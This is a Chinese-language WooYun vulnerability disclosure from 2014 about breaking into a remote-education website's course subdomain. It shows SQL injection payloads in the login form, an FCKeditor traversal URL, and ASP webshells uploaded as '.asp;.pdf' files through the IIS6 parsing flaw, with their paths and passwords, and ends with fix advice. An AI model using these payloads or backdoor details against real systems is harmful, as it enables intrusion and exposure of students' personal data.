漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-073156
漏洞标题:某远程教育网sql注入、上传漏洞获得webshell
相关厂商:中国现代远程与继续教育网
漏洞作者: feather
提交时间:2014-08-20 16:04
修复时间:2014-08-25 16:06
公开时间:2014-08-25 16:06
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-20: 细节已通知厂商并且等待厂商处理中
2014-08-25: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
已经拿到webshell,不想再深入拉
详细说明:
中国现代远程与继续教育网(www.cdce.cn)渗透测试:
在主站上找了一下,没有明显漏洞。找了下二级域名,发现course.cdce.cn精品课程这个站
在左边登陆框输入单引号测试
很明显注入
' and (0/@@version)>'
' and (0/(select top 1 password from admininfo))>'0
登陆后台
发现竟然有fckeditor....早知道就直接上传了,,,,
http://course.cdce.cn/siteManage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../../&Connector=connectors/aspx/connector.aspx
这里可以遍历文件,可是。。。。上传不了。。。?
貌似没有写权限,怎么办。。。。?
找啊找啊找目录,谁啊谁也拦不住~~~~
时间过了好久。。。。
找到一个好目录!course.cdce.cn/down/
这里可以上传!
白云下面马儿跑~~~
http://course.cdce.cn/down/pdf/WY457_2009061511.asp;.pdf
小马
course.cdce.cn/down/pdf/WY306_2009061516.asp;.pdf
这个是文件管理的asp,账号密码都是admin
course.cdce.cn/siteManage/FCKeditor/editor/dialog/common/fck_dialog_common.asp
大马,我传了之后发现自己没有删除权限了。。。管理员注意删除下
。。。
另一个大马course.cdce.cn/siteManage/FCKeditor/editor/dialog/fck_tablecell.asp
两个马都是密码123的
进去发现里面好多数据库阿。。。
还有学生照片,cet成绩等等
东西很多,放的比较乱,还有主站的数据库备份在F盘
对了,测试发现c盘可以上传,执行
各种学生资料泄露,这个内网目测还有几个服务器,一大拨电脑等待着入侵。。。安全问题不容忽视!
漏洞证明:
测试上传的文件列表如下:
http://course.cdce.cn/down/pdf/WY457_2009061511.asp;.pdf
course.cdce.cn/down/pdf/WY306_2009061516.asp;.pdf
course.cdce.cn/siteManage/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/spellerStyle.asp
course.cdce.cn/siteManage/FCKeditor/editor/dialog/common/fck_dialog_common.asp
course.cdce.cn/siteManage/FCKeditor/editor/dialog/fck_tablecell.asp
请删除,另,如果course网站整体是aspx做的,可以直接搜索后缀 .asp 文件删除。
修复方案:
首先,sql注入,过滤,大家都知道。
其次,上传漏洞,这里大部分目录限制了写权限,但是为什么漏掉一个目录呢。。?
再次,iis6的解析漏洞,这是一个大洞。
再次,各个网站的数据库都在一起的话,最好站库分离,确保数据库安全,不然一个小漏洞会导致大问题。
版权声明:转载请注明来源 feather@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-08-25 16:06
厂商回复:
最新状态:
暂无